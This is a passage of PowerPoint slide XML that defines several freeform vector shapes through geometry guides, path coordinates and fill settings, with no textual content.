                  <a:pt x="31" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="333333"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10369" name="Freeform 450"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1457325" y="7188200"/>
            <a:ext cx="298450" cy="101600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T34" fmla="*/ 0 w 132"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T37" fmla="*/ 0 h 45"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 4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45"/>
              <a:gd name="T119" fmla="*/ 132 w 132"/>
              <a:gd name="T120" fmla="*/ 45 h 4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45">
                <a:moveTo>
                  <a:pt x="55" y="43"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="56" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55" y="43"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10370" name="Freeform 451"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1393825" y="7215188"/>
            <a:ext cx="304800" cy="90487"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 135"/>
              <a:gd name="T1" fmla="*/ 0 h 40"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 135"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 40"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 135"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 40"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 135"/>
              <a:gd name="T7" fmla="*/ 0 h 40"/>
              <a:gd name="T8" fmla="*/ 0 w 135"/>
              <a:gd name="T9" fmla="*/ 0 h 40"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 135"/>
              <a:gd name="T16" fmla="*/ 0 h 40"/>
              <a:gd name="T17" fmla="*/ 135 w 135"/>
              <a:gd name="T18" fmla="*/ 40 h 40"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="135" h="40">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="132" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5"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371" name="Freeform 452"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1446212" y="7204075"/>
            <a:ext cx="298450" cy="79375"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 132"/>
              <a:gd name="T1" fmla="*/ 0 h 35"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 35"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 35"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T7" fmla="*/ 0 h 35"/>
              <a:gd name="T8" fmla="*/ 0 w 132"/>
              <a:gd name="T9" fmla="*/ 0 h 35"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 132"/>
              <a:gd name="T16" fmla="*/ 0 h 35"/>
              <a:gd name="T17" fmla="*/ 132 w 132"/>
              <a:gd name="T18" fmla="*/ 35 h 35"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="132" h="35">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="130" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4"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372" name="Freeform 453"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1423987" y="7205663"/>
            <a:ext cx="300038" cy="88900"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 133"/>
              <a:gd name="T1" fmla="*/ 0 h 39"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 133"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 39"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 133"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 39"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 133"/>
              <a:gd name="T7" fmla="*/ 0 h 39"/>
              <a:gd name="T8" fmla="*/ 0 w 133"/>
              <a:gd name="T9" fmla="*/ 0 h 39"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 133"/>
              <a:gd name="T16" fmla="*/ 0 h 39"/>
              <a:gd name="T17" fmla="*/ 133 w 133"/>
              <a:gd name="T18" fmla="*/ 39 h 39"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="133" h="39">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="130" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3"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373" name="Freeform 454"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1354137" y="6162675"/>
            <a:ext cx="561975" cy="473075"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T27" fmla="*/ 0 h 209"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T29" fmla="*/ 0 h 209"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T31" fmla="*/ 0 h 209"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T33" fmla="*/ 0 h 209"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T56" fmla="*/ 0 w 249"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 209"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 249"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 20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49"/>
              <a:gd name="T118" fmla="*/ 0 h 209"/>
              <a:gd name="T119" fmla="*/ 249 w 249"/>
              <a:gd name="T120" fmla="*/ 209 h 20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49" h="209">
                <a:moveTo>
                  <a:pt x="68" y="27"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="70" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="193" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="201" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="224" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247" y="145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247" y="146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248" y="148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248" y="160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="244" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68" y="27"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10374" name="Freeform 455"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1549400" y="6197600"/>
            <a:ext cx="179387" cy="204788"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T17" fmla="*/ 0 h 91"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T19" fmla="*/ 0 h 91"/>
